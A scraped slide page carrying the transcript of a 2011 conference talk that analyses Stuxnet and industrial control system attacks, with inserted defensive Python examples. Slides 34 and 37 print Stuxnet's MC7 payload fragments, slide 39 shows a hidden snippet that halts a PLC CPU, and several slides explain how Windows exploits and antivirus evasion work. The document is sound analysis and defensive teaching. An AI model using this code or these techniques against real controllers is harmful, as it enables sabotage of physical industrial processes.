hashdays 2011: Ange Albertini - Such a weird processor - messing with x86 opc...hashdays 2011: Ange Albertini - Such a weird processor - messing with x86 opc...
hashdays 2011: Ange Albertini - Such a weird processor - messing with x86 opc...
 
hashdays 2011: Jean-Philippe Aumasson - Cryptanalysis vs. Reality
hashdays 2011: Jean-Philippe Aumasson - Cryptanalysis vs. Realityhashdays 2011: Jean-Philippe Aumasson - Cryptanalysis vs. Reality
hashdays 2011: Jean-Philippe Aumasson - Cryptanalysis vs. Reality
 

Kürzlich hochgeladen

Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfRankYa
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
The Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfThe Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfSeasiaInfotech2
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 

Kürzlich hochgeladen (20)

Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdf
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
The Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfThe Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdf
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 

hashdays 2011: Felix 'FX' Lindner - Targeted Industrial Control System Attacks - Lessons from Stuxnet

  • 1. Targeted Industrial Control Process Attacks – Lessons from Stuxnet
    Felix ‘FX’ Lindner

  • 2. About
    - Founder and technical lead of Recurity Labs GmbH
    - Over 20 years within the computer industry
    - Specialized in attack methodologies and techniques
    - Published first exploits against Cisco IOS and RIM BlackBerry
    - Reverse Engineer by heart

  • 3. Agenda
    - Goals of attacks on ICS
    - Standard attack patterns
    - Technical review of Stuxnet
    - Stuxnet prerequisites
    - Reusable techniques and patterns
    - Current defense strategies
    - Alternative defense strategies

  • 4. Goals of ICS Attacks
    - ICS attacks that were documented:
      - Demonstration purposes
        - Power grid
        - Chemical industry
        - Railroad management
      - Detonating a Trans-Siberian natural gas pipeline (disputed)
      - Delaying a uranium enrichment program suspected to be used for nuclear weapons

  • 5. Goals of ICS Attacks

  • 6. Goals of ICS Attacks
    - Commonly suspected goals in the future:
      - Harming the competition
        - Delaying production of a competing vendor
        - Primarily aimed at Just-in-Time suppliers
      - Blackmailing ICS owners
        - Similar to documented cases of network blackmail, e.g. City of San Francisco vs. Terry Childs
      - Industrial espionage
        - Extraction of ICS programming in order to reverse engineer recipes and algorithms

  • 7. Challenges of ICS Security
    Topic                       Office IT             Control Systems
    Availability                Planned downtimes     24 x 7 x 365 x forever
    Anti-Virus                  Widely used           Uncommon / impossible
    Lifetime                    3-5 years             Up to 20 years
    Outsourcing                 Common                Becomes common
    Software patching           Regular, scheduled    Slow, vendor specific
    Change management           Common                Rare
    Real-time performance       Best effort           Critical (safety, process)
    Security awareness          Good                  Poor (only physical)
    Security testing + audits   Regular, scheduled    None
    Physical security           Difficult             Good if local, hard if remote
    Time / Log correlation      Common                Often ignored
  • 8.

  • 10. Internal Attack Patterns
    - Direct manipulation through means of subverted / bribed / disgruntled employees
      - Removal of control system source codes from site
      - Configuration of various access restrictions using passwords not communicated
    - Compromise of upstream management systems
      - Preferred method for people without ICS knowledge
      - SAP Plant Management and similar homegrown tools with no or very little access controls

  • 11. External Attack Patterns
    - Pre-compromise of production components
      - Logic bombs or intentional vulnerabilities in components acquired by the victim
    - Recommending or providing software with “side effects” to suppliers
      - Especially well-suited for expensive software components
      - Method occasionally used within the network community

  • 13. External Attack Patterns (cont.)
    1. Compromise workstation computer in office network of target
    2. Compromise server with control systems connection within target office network
    3. Establish Man-in-the-Middle point of control between operator and ICS network
    4. Modify control system

  • 14. The State of the Art in 2005

  • 15. Evolution of Standard Patterns
    - Most ICS environments used to be equipment vendor specific
      - In some industries, the production process is completely dependent on the vendors
      - Solutions are homogeneous inside, heterogeneous outside of a particular process
    - The landscape changes rapidly
      - Component based procurement standardizes the production equipment
      - Semi-standardized protocols are used to improve interoperability
      - Wireless protocols get introduced to improve flexibility

  • 16. A TECHNICAL REVIEW OF STUXNET
  • 17. Features of Stuxnet
    - Multiple spreading mechanisms:
      - CVE-2010-2568 Windows LNK Vulnerability, local code execution
      - CVE-2010-3888 Windows Task Scheduler, local privilege escalation
      - CVE-2010-2743 Windows Keyboard Layout, local privilege escalation
      - CVE-2010-2729 Windows Print Spooler Service, remote code execution
      - CVE-2008-4250 Windows Server Service RPC handling, remote code execution
      - Self-copying to remote network shares
      - Self-copying to remote Siemens WinCC servers
      - Infection of Siemens STEP7 project files for automatic launch upon load

  • 18. Features of Stuxnet (2)
    - Peer-to-peer updating mechanism in LANs
    - Contacting two predefined C&C (command and control) servers
    - Windows rootkit driver covering all Windows versions since 2000
      - Driver file is signed with a valid Code Signing certificate
    - Circumvention and corruption of 10 different client security products
      - Special treatment for 3 additional ones
    - DLL loading routine that fools behavior based HIDS detection mechanisms

  • 19. Features of Stuxnet (3)
    - Fingerprinting an industrial control process through documented and undocumented data structures in programmable logic controllers (PLCs)
    - Backdoors all instances of Siemens WinCC and STEP7 through patching its communication DLL in order to hide its presence on the PLC
    - Virtualizes the PLC on the PLC itself, in order to modify input and output controls without the legitimate code on the PLC knowing

  • 20. CVE-2010-2568: LNK
    - Uses a special feature of .LNK files
    - Explorer needs the icon of the target of the LNK file in order to render it
    - LNK uses “dynamic icons” when pointing to a control panel entry
    - Dynamic icons use an alternative handling where Explorer.exe will call the LoadLibrary API on the destination
    - LoadLibrary causes the DLL’s DllMain function to be executed during load
    → 100% reliable code execution within the context of the user’s Explorer.exe

  • 21. CVE-2010-3888: Task Scheduler
    - Uses a CRC32 compensation attack to exploit a design flaw in the Task Scheduler
    - When creating a scheduled task, the scheduler creates an XML file for it
    - The XML file contains the user the task is executed under
    - The XML file is writable by the user creating the task
    - The scheduler runs a CRC32 on it and stores the checksum in the registry
    - When the execution time arrives, the CRC32 is validated against the file
    - Stuxnet modifies the user context of the scheduled task and performs a CRC32 compensation
    → 100% reliable code execution as LocalSystem on Windows Vista and above
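  The design flaw in slide 21 is the choice of CRC32 as an integrity check over a user-writable file. The following added example (not from the slides, and not code from any vendor) shows the algebraic property that makes a "compensation" possible: CRC32 is affine over GF(2), so for equal-length inputs crc32(a ^ b ^ c) == crc32(a) ^ crc32(b) ^ crc32(c), which means the checksum effect of any edit is predictable. The same identity fails for a keyed HMAC, which is what the protected store should have held. The task definition strings and the key are constructed stand-ins; the real XML and registry layout differ.

```python
import hashlib
import hmac
import zlib


def xor_bytes(*parts: bytes) -> bytes:
    """Byte-wise XOR of equal-length byte strings."""
    if len({len(p) for p in parts}) != 1:
        raise ValueError("inputs must have equal length")
    out = bytearray(len(parts[0]))
    for part in parts:
        for i, b in enumerate(part):
            out[i] ^= b
    return bytes(out)


def crc32_affine_identity_holds(a: bytes, b: bytes, c: bytes) -> bool:
    """CRC32 is affine over GF(2): for equal-length inputs
    crc32(a ^ b ^ c) == crc32(a) ^ crc32(b) ^ crc32(c).
    Consequently the change an edit makes to the checksum is a fixed,
    computable function of the edit alone, independent of the stored value."""
    lhs = zlib.crc32(xor_bytes(a, b, c))
    rhs = zlib.crc32(a) ^ zlib.crc32(b) ^ zlib.crc32(c)
    return lhs == rhs


def hmac_affine_identity_holds(key: bytes, a: bytes, b: bytes, c: bytes) -> bool:
    """The same identity tried on HMAC-SHA256. It does not hold (the chance
    of holding by accident is 2**-256), so no edit is tag-neutral without the key."""
    def tag(m: bytes) -> bytes:
        return hmac.new(key, m, hashlib.sha256).digest()
    return tag(xor_bytes(a, b, c)) == xor_bytes(tag(a), tag(b), tag(c))


def seal(key: bytes, task_definition: bytes) -> bytes:
    """What the protected store (the registry value in the slide) should hold
    instead of a CRC32: a keyed tag over the user-writable file."""
    return hmac.new(key, task_definition, hashlib.sha256).digest()


def verify(key: bytes, task_definition: bytes, stored_tag: bytes) -> bool:
    """Validation at execution time, using a constant-time comparison."""
    return hmac.compare_digest(seal(key, task_definition), stored_tag)


# Constructed stand-ins for a scheduled-task definition; the real XML differs.
TASK_ORIGINAL = b"<Task><Principal>WORKSTATION\\alice</Principal></Task>"
TASK_MODIFIED = b"<Task><Principal>NT AUTHORITY\\SYSTEM</Principal></Task>"
SCHEDULER_KEY = b"constructed-secret-held-by-the-service"  # assumption: not readable by users


def demo() -> dict:
    tag = seal(SCHEDULER_KEY, TASK_ORIGINAL)
    probe = (b"abcdefgh", b"ABCDEFGH", b"12345678")
    return {
        "crc32_linear": crc32_affine_identity_holds(*probe),
        "hmac_linear": hmac_affine_identity_holds(SCHEDULER_KEY, *probe),
        "original_verifies": verify(SCHEDULER_KEY, TASK_ORIGINAL, tag),
        "modified_verifies": verify(SCHEDULER_KEY, TASK_MODIFIED, tag),
    }


if __name__ == "__main__":
    print(demo())
```

  A keyed tag only helps if the key is out of the task creator's reach; the simpler fix is to keep the security-relevant field (the principal) out of user-writable storage altogether, so there is nothing to validate. Either way, a plain CRC on data the attacker can write is not an integrity control.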
  • 22. CVE-2010-2743: Keyboard Layout
    - Windows XP and lower allows keyboard layouts to be loaded from anywhere
    - A (not validated) index is loaded from the layout file in kernel mode and used as an index into a function pointer table with 3 entries
    - The exploit scans the memory past the function pointer table for DWORDs that are suitable memory addresses in userland
    - When one is found (<0x80000000), it allocates memory there and triggers the vulnerability
    → 100% reliable code execution as Kernel on Windows XP and below

  • 23. CVE-2010-2729: Print Spooler
    - Enumerates printer spool shares on the network, connects as the Guest account
    - Print job requests to print an EXE and a MOF file, requesting to print to file in %SYSTEM32%
    - When printing for Guest, the spooler does not impersonate the remote user but runs as System, so writing to %SYSTEM32% is allowed
    - MOF files are compiled scripts that are placed below %SYSTEM32%
    - Windows monitors the creation and executes the MOF file’s instructions, running the EXE file
    → 100% reliable remote code execution as System

  • 24. CVE-2008-4250: Server Service
    - Known vulnerability, found being exploited in the wild by W32/Gimmiv.A
      - Interesting to note: Gimmiv.A reports installed security products back to the C&C server
    - Exploits a vulnerability in the RPC path canonicalization within the remote service
    - Patched since 2008 (MS08-067)
      - Actually turns out to be a sister vulnerability to MS06-040
    - Gains code execution as System
    - Widely used exploit in the Metasploit Framework, including a large number of target Windows versions and circumvention of DEP on Windows XP and 2003
    → Fair chance of remote code execution as System

  • 25. Special DLL Loading
    - Host IDS behavior monitoring usually looks at LoadLibrary API calls
    - Stuxnet hooks file handling routines in NTDLL.DLL in order to redirect them into memory areas when special filenames are encountered
    - When Stuxnet uses LoadLibrary, the special filenames are invalid on the file system, so HIDS will ignore the call

  • 26. Corrupting the Watchers
    Security Software     Infected Process
    KAV v1 to v7          LSASS.EXE
    KAV v8 to v9          KAV process
    McAfee                Winlogon.exe
    AntiVir               LSASS.EXE
    BitDefender           LSASS.EXE
    ETrust v5 to v6       (fail)
    ETrust (other)        LSASS.EXE
    F-Secure              LSASS.EXE
    Symantec              LSASS.EXE
    ESET NOD32            LSASS.EXE
    Trend PC Cillin       Trend process

  • 27. Siemens STEP7 Project Infection
    - Stuxnet patches the STEP7 project file handling routines to modify any project opened in the development or management IDE
      - Ignores projects older than 3.5 years
      - Ignores projects that appear to be examples
    - A specific DLL is placed in the directory “hOmSave7” of the STEP7 project
    - STEP7 specific data in “Apilogtypes” is modified, which causes the DLL from “hOmSave7” to be loaded when the project file is opened
      - The DLL is searched for in %SYSTEM32% and the STEP7 directories first, but when not found is loaded afterwards from the project’s directory

  • 28. Siemens STEP7 Project Infection (2)
    - Similar to STEP7 project infections, Stuxnet also infects MCP files, used by Siemens WinCC
    - WinCC databases are accessed through a hardcoded username/password combination for an administrative user that cannot be changed
    - Stuxnet uses remote SQL commands to transfer itself to the server and execute there
    - Project files (even locally) are infected with itself and a cabinet file in “GracScc_tlg7.sav”
      - Such projects, if loaded into a WinCC server manually, may execute Stuxnet as well

  • 29. Siemens PLC Infection
    - On Windows PCs with Siemens PLC software, the DLL “s7otbxdx.dll” is replaced by a wrapper
      - The original version is kept for functionality
    - The wrapper ensures that:
      - When writing to the PLC, the Stuxnet PLC payload is added in transit
      - When reading from the PLC, the Stuxnet PLC payload is removed and hence hidden from view
    - An additional thread runs, monitoring the PLC and verifying target properties
    - A second additional thread controls a Data Block on the PLC, remotely managing its behavior
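  Slides 27 and 29 give two artefacts a defender can look for on an engineering station without any vendor tooling: a DLL sitting inside a STEP7 project directory (project folders carry automation data, not executables; slide 27 names the “hOmSave7” subfolder) and an s7otbxdx.dll that no longer matches the file delivered with the installation. The added example below (written for this page, not code from Siemens or from the talk) implements both checks against a constructed directory tree in a temporary folder; the known-good hash is a placeholder that a real deployment would take from a clean installation medium.

```python
from __future__ import annotations

import hashlib
import tempfile
from pathlib import Path


def sha256_of(path: Path) -> str:
    """Streamed SHA-256 of a file."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def find_dlls_in_project(project_root: Path) -> list[str]:
    """Project-relative paths of every *.dll below a STEP7 project root.
    Any hit is reportable: a project directory should contain no executables."""
    hits = []
    for p in project_root.rglob("*"):
        if p.is_file() and p.suffix.lower() == ".dll":
            hits.append(p.relative_to(project_root).as_posix())
    return sorted(hits)


def check_s7otbxdx(install_dir: Path, known_good_sha256: str) -> dict:
    """Compare the installed s7otbxdx.dll with the hash of the vendor-delivered
    file (placeholder here; take it from a clean installation)."""
    dll = install_dir / "s7otbxdx.dll"
    if not dll.exists():
        return {"present": False, "matches": False}
    return {"present": True, "matches": sha256_of(dll) == known_good_sha256}


def build_sample(root: Path) -> None:
    """Constructed sample tree: a project with a planted DLL under hOmSave7
    and an s7otbxdx.dll whose content differs from the baseline."""
    proj = root / "Projects" / "line3"
    (proj / "hOmSave7").mkdir(parents=True)
    (proj / "line3.s7p").write_bytes(b"constructed project header")
    (proj / "hOmSave7" / "planted.dll").write_bytes(b"MZ constructed payload")
    (root / "S7bin").mkdir()
    (root / "S7bin" / "s7otbxdx.dll").write_bytes(b"MZ wrapper (constructed)")


def run_demo() -> tuple[list[str], dict]:
    """Build the sample tree, run both checks, return their findings."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample(root)
        dlls = find_dlls_in_project(root / "Projects" / "line3")
        # Placeholder baseline: hash of what a clean install would contain.
        known_good = hashlib.sha256(b"MZ original (constructed)").hexdigest()
        status = check_s7otbxdx(root / "S7bin", known_good)
    return dlls, status


if __name__ == "__main__":
    print(run_demo())
```

  Both checks read the files directly from disk, so the wrapper's filtering of PLC reads (slide 29) does not affect them; the rootkit driver from slide 18 can, however, hide files from a live system, so run the scan from a clean boot medium or against an offline image of the station. Projects older than 3.5 years are skipped by Stuxnet, not by this scan, which is the right way round for a defender.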
  • 30. Siemens PLC Infection (2)
    - Before infecting any PLC, the injected code on the Windows PC verifies properties
      - PLC CPU type 6ES7-417 or 6ES7-315-2
      - CP 342-5 Profibus interface module is present
      - At least 33 devices with Profibus identification number 0x7050 or 0x9500 are present
        - Identification numbers are assigned globally unique by vendors and Profinet International, comparable to IANA
        - The devices are Variable Frequency Drives (VFDs) from Fararo Paya (Iran) and Vacon (Finland)

  • 31. Stuxnet MC7 Payload
    - Three payloads are delivered with Stuxnet
      - Two almost identical payloads for 315-2 CPUs
        - Called Block A and B by Symantec
      - One larger payload for 417 CPUs
        - Called Block C by Symantec
    - Replacement of DP_RECV
      - DP_RECV is responsible for the processing of received Profibus messages on the PLC
      - Original function code is moved and a malicious replacement is embedded
    - Organization Block (OB) 1 (cyclic execution) is patched with a call to the Stuxnet MC7 payload
    - OB35 (timed execution) is patched with a call to the Stuxnet MC7 payload (watchdog function)

  • 32. Binary Comparison of Block A and B

  • 33. Stuxnet MC7 Payload (2)
    - Block A/B implement a state machine
      1. Record frames via DP_RECV and monitor values of the VFD, until enough events are recorded
      2. Wait 2 hours
      3. Send bursts of Profibus frames to the VFDs (Phase I)
         - 145 or 127 frames (Vacon VFDs)
         - 34 or 32 frames (Fararo Paya VFDs)
      4. Send bursts (Phase II)
         - 2 or 36 frames (Vacon VFDs)
         - 23 or 27 frames (Fararo Paya VFDs)
      5. Reset internal values and reinitialize internal structures
    - State 0 is the global error handler.

  • 34. Stuxnet MC7 Payload Code
      ADD_AC:                         // CODE XREF: S7_LV+94p
          OPN   DB888
          L     DBW10h                // word 888.16
          L     W#16#3                // word 3
          <I                          // ACCU2 is less than ACCU1
                                      // 3 > 888.16
          JC    loc_2840              // jump if RLO=1 (DW888.16 < 3)
                                      // (do not jump if DW888.16 is 3 or more)
          TAK                         // exchange ACCU1 and ACCU2
          L     W#16#4                // ACCU1 = 4
          >I                          // ACCU2 is greater than ACCU1
                                      // 4 < 888.16
          JC    loc_2840              // jump if RLO=1 (DW888.16 > 4)
                                      // (do not jump if DW888.16 is 4 or less)
          L     DW#16#0DEADF007h
          PUSH                        // copy ACCU1 into ACCU2
          BE
      loc_2840:                       // CODE XREF: ADD_AC+Ej
                                      // ADD_AC+1Aj
          L     DW#16#0
          PUSH                        // copy ACCU1 into ACCU2
          BE

  • 35. Timing of the MC7 Payload
    - Recording takes place for 13 days
    - Wait 2 hours (fixed)
    - Pause after first burst is 27 days
    - Pause after second burst is 27 days
    → 67 days for one cycle of attack
    - Wearing out was the goal, not destruction
    - The product of the attacked process was the target, not the production equipment
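  The payload described in slides 30 to 35 is quiet for 13 days, then pushes 127 to 145 frames at a Vacon drive (32 to 34 at a Fararo Paya one) in a short burst, and repeats only after 27 days. On the Profibus side that traffic pattern is visible: a per-device frame rate that sits at the cyclic polling rate for weeks and then jumps by an order of magnitude. The added example below (written for this page; not code from the talk or from any product) is a simple rate-baseline detector run over a constructed capture, where a "capture" is a list of (seconds, destination address) pairs as a Profibus tap or analyzer export would give after parsing; the window size and the alert factor are assumptions.

```python
from __future__ import annotations

from collections import Counter, defaultdict
from statistics import median

WINDOW = 10.0   # seconds per counting window (assumption)
FACTOR = 5.0    # alert when a window exceeds FACTOR x the device's baseline (assumption)


def count_windows(frames, window: float = WINDOW) -> dict[int, Counter]:
    """frames: iterable of (t_seconds, dst_addr). Returns {dst: Counter{window_index: frames}}."""
    per_dev: dict[int, Counter] = defaultdict(Counter)
    for t, dst in frames:
        per_dev[dst][int(t // window)] += 1
    return per_dev


def detect_bursts(frames, baseline_windows: int, window: float = WINDOW,
                  factor: float = FACTOR) -> list[tuple[int, int, int, float]]:
    """Baseline = median frame count over the first `baseline_windows` windows,
    per destination. Any later window above factor x baseline is an alert:
    (dst_addr, window_index, frames_in_window, baseline)."""
    per_dev = count_windows(frames, window)
    alerts = []
    for dst, counts in per_dev.items():
        base_counts = [counts.get(i, 0) for i in range(baseline_windows)]
        base = max(median(base_counts), 1)       # never divide by a silent baseline
        for idx in sorted(counts):
            if idx >= baseline_windows and counts[idx] > factor * base:
                alerts.append((dst, idx, counts[idx], base))
    return alerts


def constructed_capture() -> list[tuple[float, int]]:
    """Constructed sample: 200 s of cyclic polling at one frame per second to
    three drives (addresses 3, 4, 5), plus a 145-frame burst to drive 4 within
    two seconds starting at t=130, mirroring a Phase I burst to a Vacon VFD."""
    frames = [(float(s), dst) for s in range(200) for dst in (3, 4, 5)]
    frames += [(130.0 + k * (2.0 / 145), 4) for k in range(145)]
    return frames


if __name__ == "__main__":
    for alert in detect_bursts(constructed_capture(), baseline_windows=6):
        print("burst: dst=%d window=%d frames=%d baseline=%.0f" % alert)
```

  Two caveats follow from the slides. The tap must sit on the Profibus side: the s7otbxdx.dll wrapper on the engineering station (slide 29) filters what the PC is allowed to see, so a host-based view of the PLC is not trustworthy. And the 13-day recording phase plus 27-day pauses mean a baseline learned over a few hours is useless; the quiet period has to be covered by the baseline and the detector has to keep running for months.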
  • 36. PLC Virtualization / Decoupling  PLCs, including Siemens S7, execute in cycles  Read all input signals and set input table  Execute OB1  Write all output Bits to output table and generate signals  Stuxnet disables the automatic update of the Process Image Input and Output Table  Essentially decoupling the entire PLC from its sensor array, virtualizing it  Allows the Stuxnet payload to modify input and output Bits (corresponding to signals) so the original code doesn’t notice any changes   No explicit operator spoofing required! This method may even fool people manually debugging the PLC.
  • 37. PLC Input / Output Decoupling L LW0 BLD +7 = L 14h.0 L B#16#0 T LB15h UC SFC1Ah // Update Process Image Input Table JU loc_24 (arg) P# L 15h.0 (arg) P# L 0.0 (arg) P# L 0.0 loc_24: BLD +8 BLD +7 = L 14h.0 L B#16#0 T LB15h UC SFC1Bh // Update Process Image Ouput Table JU loc_46 (arg) P# L 15h.0 (arg) P# L 0.0 (arg) P# L 0.0 loc_46: BLD +8 T LW0
  • 38. BLD: A Trick Not Used  STEP7 engineers frequently use a simple trick to hide code  The BLD instruction is used as a marker around blocks of code  The instruction has no effect on the PLC, but is interpreted by the Siemens editors. Known combinations are:  BLD 1 / 2 (FC with parameters)  BLD 3 / 4 (FB with parameters)  BLD 7 / 8  BLD 14 / 15 (FC without parameters)  BLD 103 / 104  BLD 130 / 131 / 132 / 133 / 255  The STUXNET code does not make use of this trick  It actually keeps the original BLD instructions, wasting space and simplifying analysis using Siemens tools
  • 39. BLD Hiding BLD +7 A "Always ON" // When being nasty, use this snippet JC Run UC SFC 46 // Stops the CPU Run: NOP 0 ... your code ... CC or UC of your FC's BLD +8  Call SFC46
